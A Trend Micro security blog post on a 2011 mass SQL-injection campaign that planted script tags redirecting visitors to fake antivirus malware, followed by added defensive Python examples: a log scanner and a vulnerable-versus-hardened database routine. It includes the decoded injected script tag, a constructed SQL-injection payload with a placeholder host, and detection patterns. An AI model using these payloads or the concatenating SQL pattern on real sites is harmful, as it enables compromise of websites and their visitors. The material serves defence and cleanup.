Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
We’re currently monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV.

Based on Google searches, there is no common denominator in terms of the industry to which the compromised sites belong. We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others.

More URLs Involved

Investigations revealed that five URLs were used for the attack and were inserted into the compromised sites through SQL injection. The said URLs all resolve to a single IP server, a known malicious IP address that Trend Micro researchers are monitoring. Thus, the related URLs have been proactively blocked by Trend Micro as early as March 25, 2011:

• {BLOCKED}
• {BLOCKED}
• {BLOCKED}
• {BLOCKED}
• {BLOCKED}

New developments are currently being observed. We’re seeing compromised websites that were previously inserted with a script leading to {BLOCKED} already modified to connect to {BLOCKED}. The said URL also resolves to the same IP server as the four previously mentioned URLs. It is possible that the cybercriminal behind this attack is updating the compromised sites with new URLs to connect to since the previous ones are already being blocked.

Infection Chain Leads to FAKEAV and WORID

So far, the infection chain has been typical. Visiting a compromised website with the malicious script leads to any of the above-mentioned URLs, which then triggers a series of redirections, finally leading to the download of malicious files. The redirections are visible to the user, as the displayed pages show a fake antivirus scan. The scan is, of course, fake, and is the first part of the whole FAKEAV scam, followed by a prompt to download a malicious file disguised as an installer.

Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.

Web compromises such as this one are not uncommon but do pose a great threat, especially if a particular website with high incoming traffic is among those compromised. Trend Micro, through the Smart Protection Network™, protects users from being affected by this compromise, as the related malicious URLs are already blocked and the malicious files detected.

Website owners who suspect that their websites have been compromised are advised to clean up their sites as soon as possible.

Update as of April 6, 2011 2:00 AM Pacific Time

Further analysis reveals that ASPX and ASP web app sites are being exploited by a GET request whose parameters contain SQL statements and the encoded script tag and URL shown below:

This decodes to the following:

</title><script src=http://{BLOCKED}on(dot)com/ur.php></script>

We also found that attackers were using a certain IP ({BLOCKED}.{BLOCKED}.29.190) to try to inject sites with lizamoon(dot)com/ur.php and other URLs pointing to the same IP location as lizamoon. We saw the said IP address trying to compromise a web server located in the APAC region using the following technique.
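One way a site administrator can check web server access logs for the request pattern described above (SQL statements in a GET parameter carrying a hex-encoded script tag). This is an added example, not code from the original post or from Trend Micro: the log lines, the `blocked.invalid` host name and the injected parameter value are all constructed placeholders, and the detector simply decodes any `0x...` hex literal it finds in a decoded query string and flags it when the result contains markup.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Constructed placeholder for the injected tag; the original post blocks the real host.
SCRIPT_TAG = "</title><script src=http://blocked.invalid/ur.php></script>"
HEX_LITERAL = "0x" + SCRIPT_TAG.encode("ascii").hex()
# Constructed parameter value: a valid id followed by SQL that unpacks the hex literal.
INJECTED_VALUE = (
    "42;DECLARE @s VARCHAR(4000);"
    f"SET @s=CAST({HEX_LITERAL} AS VARCHAR(4000));EXEC(@s)--"
)

# Constructed access-log lines in common log format (not from the original post).
SAMPLE_LOG = "\n".join([
    '198.51.100.23 - - [31/Mar/2011:10:12:01 +0000] "GET /news.aspx?id=42 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [31/Mar/2011:10:12:02 +0000] "GET /news.aspx?id=42&page=2 HTTP/1.1" 200 4870',
    f'203.0.113.190 - - [31/Mar/2011:10:12:05 +0000] "GET /news.aspx?id={quote(INJECTED_VALUE, safe="")} HTTP/1.1" 200 5120',
    '203.0.113.190 - - [31/Mar/2011:10:12:06 +0000] "GET /search.aspx?q=select+committee HTTP/1.1" 200 900',
])

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# SQL control keywords that have no business in the query string of a content site.
SQL_KEYWORDS_RE = re.compile(
    r"\b(declare|cast|exec|execute|select|update|insert|delete|drop|union)\b", re.IGNORECASE
)
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{8,})")
MARKUP_RE = re.compile(r"<\s*/?\s*(script|title|iframe)\b", re.IGNORECASE)


def decode_hex_literals(text):
    """Decode every SQL-style hex literal (0x...) in text into a string."""
    decoded = []
    for match in HEX_LITERAL_RE.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:          # tolerate a truncated literal
            digits = digits[:-1]
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def analyze_request(target):
    """Return the reasons a request target looks like a script-injection attempt."""
    query = unquote_plus(urlsplit(target).query)   # undo percent-encoding once
    reasons = []
    keywords = {k.upper() for k in SQL_KEYWORDS_RE.findall(query)}
    if len(keywords) >= 2:   # a lone "select" in a search term is noise, two or more is not
        reasons.append("sql keywords: " + ", ".join(sorted(keywords)))
    for text in decode_hex_literals(query):
        if MARKUP_RE.search(text):
            reasons.append("hex literal decodes to markup: " + text)
    if MARKUP_RE.search(query):
        reasons.append("raw markup in query string")
    return reasons


def scan_log(log_text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        reasons = analyze_request(match.group("target"))
        if reasons:
            findings.append({"line": lineno, "ip": match.group("ip"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']} from {finding['ip']}: " + "; ".join(finding["reasons"]))
```

Run against the constructed log, only the third line is reported: it carries three SQL keywords and a hex literal that decodes to a `</title><script ...>` tag, while the search for "select committee" stays below the two-keyword threshold. Decoding the hex literal is the important step, since the raw request never contains the string `<script`.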

Trend Micro customers using Threat Discovery Appliance (TDA) as well as Deep Security are already protected from having their sites compromised using the mentioned technique.

Cleanup efforts as well as development of fixes have reportedly started to mitigate the effects of the massive attack. However, we’re also still seeing new URLs being injected into websites, connecting to an IP server different from the one previously used. We’ve already blocked access to the said URLs.

Considering such developments, website owners of both infected and non-infected sites are strongly advised to take action. Owners of infected sites should clean up their sites and apply security updates to all software, and those not affected should make sure that their sites are not vulnerable to similar attacks, for example by making sure that all inputs to the website are properly validated.
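The advice above comes down to two code-level controls: validate each input, and never concatenate it into a SQL statement. The following is an added example, not code from the original post or from Trend Micro, showing the concatenating pattern beside its hardened form and a cleanup query a site owner can run to find records that already carry an injected tag. It uses an in-memory SQLite table as a stand-in for a site's content database; the injected tag with its `blocked.invalid` host and the tampered parameter value are constructed placeholders, and `executescript` is used in the vulnerable function only to mimic a driver that runs batched statements (an assumption about the affected ASP/ASPX stacks, not something the post states).

```python
import sqlite3

# Constructed placeholder for the injected tag; the original post blocks the real host.
INJECTED_TAG = "</title><script src=http://blocked.invalid/ur.php></script>"
# Constructed tampered request parameter: a valid id followed by a second statement.
TAMPERED_ID = "1; UPDATE pages SET title = title || '" + INJECTED_TAG + "'"


def make_db():
    """In-memory stand-in for the site's content database, with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, hits INTEGER)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, 0)",
                     [(1, "Astronomy club"), (2, "Hospital news")])
    return conn


def count_hit_vulnerable(conn, page_id):
    """Concatenates the request parameter straight into SQL.

    executescript stands in for a database driver that executes batched statements
    (assumption, not from the post), so everything after the ';' runs as SQL too.
    """
    conn.executescript("UPDATE pages SET hits = hits + 1 WHERE id = " + page_id)


def count_hit_hardened(conn, page_id):
    """Validates the parameter as a positive integer, then binds it as a value.

    Binding means the database never parses the parameter as SQL; the validation
    step rejects the tampered value before it reaches the database at all.
    """
    if not page_id.isdigit():
        raise ValueError("page id must be a positive integer")
    conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (int(page_id),))


def injected_titles(conn):
    """Cleanup check for site owners: ids of rows whose title now carries a script tag."""
    rows = conn.execute("SELECT id FROM pages WHERE title LIKE '%<script%' ORDER BY id")
    return [row[0] for row in rows]


def hits_for(conn, page_id):
    """Current hit counter for one page (helper for checking results)."""
    return conn.execute("SELECT hits FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    count_hit_vulnerable(db, TAMPERED_ID)
    print("vulnerable: rows with injected tag ->", injected_titles(db))   # every row

    db = make_db()
    try:
        count_hit_hardened(db, TAMPERED_ID)
    except ValueError as err:
        print("hardened: rejected input:", err)
    count_hit_hardened(db, "1")
    print("hardened: rows with injected tag ->", injected_titles(db))     # none
```

The cleanup query is the piece an owner of an already-compromised site needs first: it finds every record that carries the tag so the content can be restored before the input-handling fix is deployed, since fixing the code alone leaves the injected tags in place.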



© Copyright 2013 Trend Micro Inc. All rights reserved.